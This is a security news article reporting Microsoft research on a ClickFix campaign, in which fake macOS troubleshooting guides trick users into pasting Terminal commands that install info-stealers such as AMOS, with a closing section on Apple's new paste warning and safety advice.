Microsoft Defender Security Research Team has identified a new campaign designed to gain unauthorised access to Apple computers with a social engineering trick called ClickFix. This method has become a preferred choice for scammers lately, as Hackread.com has been tracking the rising trend of these attacks.
The new research from Microsoft adds to these observations, showing how the technique is being used to evade traditional security and steal high-value data from unsuspecting users.
The trap of fake troubleshooting
This campaign starts with tricking people who are looking for help with their MacBooks. According to Microsoft’s research, since late 2025 and throughout early 2026, scammers have been tricking people with fake troubleshooting guides on sites like Medium, Craft, and Squarespace, which promise to fix a common problem, like needing to free up disk space or fix a system error.
Instead of offering a download, the sites offer a command, claiming it is a system utility or a quick fix, and the user has to copy and paste the code into their Mac’s Terminal. “Some sites present this information in multiple languages. As of this writing, these websites that we’ve observed are either already down or have been reported,” researchers noted in the blog post.
As soon as the command is run, your Mac secretly downloads malware like AMOS (Atomic macOS Stealer), Macsync, or SHub Stealer. And, since you ran the command yourself, the Mac’s normal security checks, such as Gatekeeper, are skipped.
Gatekeeper usually only inspects app bundles and disk images, so it trusts the user’s direct command. The malware then shows a fake box asking for a system password to install a helper tool. If provided, the hackers gain full access to files and settings.
What the hackers are after
The objective behind these scams is to obtain as much private information as possible. In this particular campaign, the malware specifically targets:
- Information from your iCloud and Telegram accounts.
- Private documents, notes, and photos smaller than 2 MB.
- Private crypto wallet keys, including Exodus, Ledger, and Trezor.
- Saved passwords and login data from browsers like Chrome and Firefox.
Microsoft reports that in some cases, attackers even deleted the user’s authentic crypto apps and replaced them with fake, trojanized versions, mainly to monitor transactions and steal funds. Also, hackers are now, reportedly. using curl, osascript, and similar tools to run the attack directly in Mac’s memory. This fileless method makes detection very difficult for standard antivirus software. Microsoft’s team also discovered a kill switch in the malware that stops working if it detects a Russian keyboard.
How to Stay Safe
This problem has been addressed by Apple by adding a safety feature in macOS 26.4. This feature will now generate a warning saying: “Possible malware, Paste blocked” every time you paste a suspicious command into Terminal.
As an additional precaution, researchers suggest avoiding copy-pasting commands from any blog or website without verifying the source and only trusting official updates and guides from Apple to fix issues in your Mac.
